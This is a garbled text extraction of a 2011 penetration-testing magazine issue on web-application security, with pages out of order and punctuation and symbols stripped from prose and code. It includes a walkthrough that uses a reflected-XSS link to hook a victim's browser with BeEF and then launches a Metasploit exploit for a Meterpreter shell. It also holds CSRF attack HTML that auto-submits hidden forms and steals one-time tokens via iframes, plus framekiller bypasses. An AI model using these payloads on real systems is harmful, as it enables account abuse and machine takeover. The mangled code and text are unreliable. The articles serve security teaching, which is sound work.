Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
